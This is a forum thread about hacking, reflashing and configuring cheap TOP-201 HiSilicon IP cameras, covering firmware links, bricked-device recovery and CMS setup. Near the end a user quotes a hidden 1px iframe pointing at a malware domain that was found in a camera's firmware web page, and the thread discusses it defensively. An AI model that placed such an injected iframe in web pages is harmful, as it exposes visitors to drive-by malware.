Review - TOP-201 Super Mini 720P HD IP-Cam (The Cheapest IP Cam So Far !!)

gordo

Pulling my weight
Reaction score
Any Idea how to enable and to perform the upgrade or a different version of teh firmware?
To restore wifi in the 6500 board Top-201 camera you can try the firmware in post #740. This firmware is older but has worked for others.

raceboy

n3wb
Reaction score
...hello. i recently brick my chinese ip camera. i think it was bad firmware. so i can't ping camera anymore. ethernet connection drops all the time (every second). is there a way to repair that? thanx

gordo

Pulling my weight
Reaction score
raceboy, you could try the tool in post #722

raceboy

n3wb
Reaction score
thanx. but. as i can see this tool works only there is connection to the camera ? (eg. if camera is reacheable on 192.168.1.10) ?

n3wb
Reaction score
I would like to learn what I usefull stuff I could do with it besides mounting drives....
Almost all DVR/NVR/IP Camera functions are compiled in its main program - Sofia, so there are only device drivers to play with (lsmod/insmod) or you can kill/start Sofia to see complete logging and detail info about your system.
Anyway, you can see all available commands by pressing TAB twice.
In order to play with third party stuff, you have to:
1. Install your own NFS server
2. Log in to your camera and mount your NFS share
3. Now you can try to execute any binary program compatible with HiSilicon ARM architecture. To be honest, i personally didn't find anything useful compiled for that architecture. So you hava to compile things yourself.

3. Yes they are supposed to be edited, however the files when opend in an editor don't make sense to me. Maybe I'm using the wrong editor / wrong mode or other things wrong.
Try this online editor: http://json.parser.online.fr/

Howver after uploading I'm getting the message "Ugrade failed".
I'm sorry for troubles you met, but i don't own ontopic 6510 camera model. Maybe you should try to update your firmware to the latest commercial release first: http://wiki.xm030.com/index.php/IPC程序下载地址 And only after that try to install any betas.

Reaction score
jenkins, I believe this is the one you requested. https://dl.dropboxusercontent.com/u/37759044/General_HZXM_IPC_HI3518E_50H10L_S38_RT3070_V4.02.R12.20150317_ALL.zip
Replace the xx in link. I also have an older firmware for wifi with the 6510 board if this doesn't work.
Here is older wifi one for 6510 board camera. https://dl.dropboxusercontent.com/u/37759044/General_HZXM_IPC_HI3518E_53H13_S38_V4.02.R12.20150117_ALL.bin

Links updated
Thank you the top one worked fine and wifi works.

I recently purchased another camera which uses a hi3518e from here http://www.aliexpress.com/item/ABS-Plastic-Material-Wireless-IP-Camera-720P-With-SD-Slot-Max-32G-One-Key-WPS-ONVIF/32590449247.html
Instead of a 6510 this is a 7510. This one is really worrying me though, it works fine through the CMS software but accessing it through the browser gets blocked by avast warning me about "JS:Iframe-BQC [Trj]" which seems to be a common infection in websites to install Trojans. Any chance this is a false positive or is the actual camera trying to give me a virus.

alastairstevenson

Staff member
Reaction score
If you want to take a small risk, and are familiar with either network packet capture / inspection or HTTP inspection using built-in IE (F12) and Chrome (developer tools) tools, you could from a guest-rights-only account tell your AV it's OK, or disable it, block the camera IP outbound at your router, connect to the camera, and inspect the result for any attempted internet access that should not be there.
You may be able to spot the iFrame and inspect what's in it.

Bradley Parsons

Young grasshopper
Reaction score
Does anyone know which configure file in the camera contains the settings for brightness, contrast, gain, etc.

I know it can be accessed thru csm but my device keeps setting contrast and saturation to 27 on its own which makes the image way to dark.

Last edited by a moderator:

Nerd

n3wb
Reaction score
Thanks for the help. Wiil play with json editor / parser some times.

Almost all DVR/NVR/IP Camera functions are compiled in its main program - Sofia, so there are only device drive.......

I'm sorry for troubles you met, but i don't own ontopic 6510 camera model. Maybe you should try to update your firmware to the latest commercial release first: http://wiki.xm030.com/index.php/IPC程序下载地址 And only after that try to install any betas.
Thanks! I did now. I manged to update to that "official" version yeah.
00006510 IPC_HI3518E_50H10L_S38 http://pan.sohu.net/f/MTY2NzYsaGRkaWQ.htm
and then to this beta version:
http://bbs.xm030.com/forum.php?mod=viewthread&tid=5687&highlight=50H10L

sucessfully. V4.02.R12.00006510.00010.130300, build date: 2016-01-05 19:59:51. system stauts 579.
Interestingly the system status stayed the same as on the version with build date: 2015-09-10 10:20:36.
The good thing they removed the cloud stuff and the memory stuff (this number block in the ver changed from 10010 to 00010) however the gmail SSL SMPT on port 465 still does not work for me. btw. I am using the CMS windows tool with the remote confg function that is placed in the SYSTEM tray. It seems to have same functions as the IE interface provides.
It looks like the ports are a bit differen: no more 23 but 80,554,34567,8899,9527,9530. may the 23 Telenet has be moved to 9530.... Will test that tomorrow.
I didn't find other beta versions that seem to match my hardware. I jet failed to figure out the codeing behind the "50H10L" numer letter combination, the meaning of S38 ( isuppose to have a S39 version ?) There are RA50H10L versoin but I have no idea what the difference might be. well.

(The firmware from post #765 works as well however it's build date: 2015-01-16 08:59:32
system status: 578 and without working SMTP SSL Gmail).
Still the search for a solution tha will send emails from gmail via Port 465 with SSL on SMTP is on.

PS:
I have ordered a cheap 8 channel NVR. Maby I get the email notification run on that system.
So far I didn't brick my cam, I manged to switch between 3 working firmware version, get used to the tools... and learned a lot.

Nerd

n3wb
Reaction score
Does anyone know which configure file in the camera contains the settings for brightness, contrast, gain, etc.

I know it can be accessed thru csm but my device keeps setting contrast and saturation to 27 on its own which makes the image way to dark.
Hi. did you play with the CMS? In the system tray you can slect remote config. Once slected you should get a window. Select the round GEAR icon. Then you should get into the system setting icon collection. select Camera param. Here you can change many settings of the cam. You have to press OK after changes. Then after the OK you can see immideatly the changes on the life streamed picture.
May that helped.

Mel!

n3wb
Reaction score
Thank you the top one worked fine and wifi works.

I recently purchased another camera which uses a hi3518e from here http://www.aliexpress.com/item/ABS-Plastic-Material-Wireless-IP-Camera-720P-With-SD-Slot-Max-32G-One-Key-WPS-ONVIF/32590449247.html
Instead of a 6510 this is a 7510. This one is really worrying me though, it works fine through the CMS software but accessing it through the browser gets blocked by avast warning me about "JS:Iframe-BQC [Trj]" which seems to be a common infection in websites to install Trojans. Any chance this is a false positive or is the actual camera trying to give me a virus.
I guess you could download a 30 day trial of kaspersky, temporarily uninstall avast, then install and update kaspersky to see if it too finds anything.

Or alternatively download and install vmware and a windows 7 virtual machine from microsoft to test it in https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/ and install kaspersky on that.

gordo

Pulling my weight
Reaction score

dreadbit

n3wb
Reaction score
Hello guys,
I was amused that the 20150910 firmware has the webcapture.jpg comman=snap feature.

Looking at the Sofia binary (I've got the firmware unzipped and made 'unsquashfs' from the user-x.cramfs.img [skipping it to 'hsqt' signature]) from 20151127 firmware from here bbs.xm030.com/thread-5424-1-1.html , I did not notice the webcapture.jpg string (this firmware looks like 3518E/6510 one, right?).

Did anyone test this firmware? Does command=snap work? Did anyone dig something interesting from it?

bbdom

n3wb
Reaction score
Hi All

Just a quick question. I've got a number of the TOP201 and a couple of the TOP308 cameras and in the CMS software supplied, there is the option to enable RS-232 (serial) - has anyone had a play to see if we can use the serial port on these cameras over the Ethernet ? Could they potentially have a couple of spare pins designated for RS-485 so we can add PTZ capability ?

Reaction score
Good time of day. I have a question.

сms not found device ^-( camera
Ir led light all
6510 version i have

I updated the firmware in the camera and the light was gone (Energy consumption) is now the camera is not detected on the local network that is It does not receive any IP addresses. Whether it is possible to animate the camera? I understand she flew firmware?

Kamalas

n3wb
Reaction score
okay, this is my second super mini camera. The first time was a real struggle to setup and that was over a year ago. So I was rusty. I have not scanned all 50 pages of this forum before posting this info. So it may well be a duplicate. Perhaps the original poster will find this useful and copy/reference some device config and setup info in to the first post.

I bought this guy
http://www.aliexpress.com/item/2-0MP-1080P-IP-Camera-Main-board-module-CCTV-chipboard-Network-Camera-with-2-8-12mm/32428341323.html

The default ip is 192.168.1.10, port is 34567
My network is 192.168.0.X based. So when trying to connect to the found device in CMS; on adding, it says "Cann't Find Device" sic, "Can't Find Device"
Solution: I changed my ip on my PC to say 192.168.1.50. Added the device in CMS and then was able to access the device config to then set DHCP or set an IP address. I assigned an IP address. I also changed the port, but recommend doing this later.

After that I exited out of the CMS software and returned my PC ip address to as was previous.

Next problem: I changed the IP address of the camera but the CMS software still lists the device as the old IP address 192.168.1.10
Solution: You have to edit the device via device manager in CMS and make the same IP/port changes there too
OR
Edit C:\Program Files (x86)\CMS\XML\Data.xml (editor must be run as administrator). You will see the device but the connection information as says 192.168.1.10. Edit the file and make the changes. Save and load CMS software.

Changing port. Change the port in CMS for both the device and the device manager (or Data.xml), Reboot the camera. Open CMS and test it.

(Device manager is in the system menu and has a red button type icon.)

The_Moves

n3wb
Reaction score
Has anyone had any luck getting this to work with Synology Survielance Station 7.1? I just got the ELP-1881 off Amazon and it appears nearly identical.

Edit 3-19-2016: I got my ELP-1881 working with stock ONVIF setting. It just took like 4 minutes from initial import to start sending video. I have been able to get it to change to 720p. When attempting to use the second stream,such as for mobile and live view, i ran into issues.

icebox

n3wb
Reaction score
I wrote a little guide to recover the TOP201 camera in case it's gets bricked during a firmware upgrade.
truxntrax has the recovery files, which got me back up and running, after I bricked my camera.
The guide is in Microsoft Word 2002, Word Document format with some screenshots.
Much thanks to everyone in this forum that contribution to this great thread. View attachment Guide to recovery of TOP201 by Icebox.3.18.16.doc

Reaction score
If you want to take a small risk, and are familiar with either network packet capture / inspection or HTTP inspection using built-in IE (F12) and Chrome (developer tools) tools, you could from a guest-rights-only account tell your AV it's OK, or disable it, block the camera IP outbound at your router, connect to the camera, and inspect the result for any attempted internet access that should not be there.
You may be able to spot the iFrame and inspect what's in it.
Had a look and the cameras index page and it contains this at the bottom.

iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe
After a quick google, it seems that whoever wrote the firmware has a virus that infects all webpages on their computer. Or (hopefully not) they are intentionally doing this. I have contacted the seller anyway and hopefully he will rectify this.

alastairstevenson

Staff member
Reaction score
Wow! Well done for figuring that detail. Hopefully safely. A 1px escaped iframe link. Classic web virus stuff! Plenty of Google hits too.
It will be interesting to see what response you get.